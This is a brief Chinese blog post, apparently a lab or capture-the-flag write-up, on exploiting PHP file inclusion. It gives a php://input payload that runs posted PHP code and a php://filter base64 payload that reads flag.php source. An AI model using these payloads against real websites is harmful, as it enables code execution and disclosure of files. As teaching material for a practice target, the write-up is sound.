檔案包含的練習

- 利用php://input協議來驗證網頁是否有檔案包含漏洞
php://input 協議 需要allow_url_include ?file=php://imput [POST DATA]<?php phpinfo()?>
訪問請求的原始資料的制度流,將post請求的資料當做php代碼來執行

- 利用php://input協議來進行目錄跳轉以及查看根目錄下的flag檔案




- 訪問fi目錄檔案


聯系上文,已知他是檔案包含靶場,所以利用php://filter協議進行base64加密的方式將flag.php頁面展現出來

php://filter/read/convert.base64-encode/resource=flag.php
將網頁資訊進行base64解碼

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/294406.html
標籤:其他
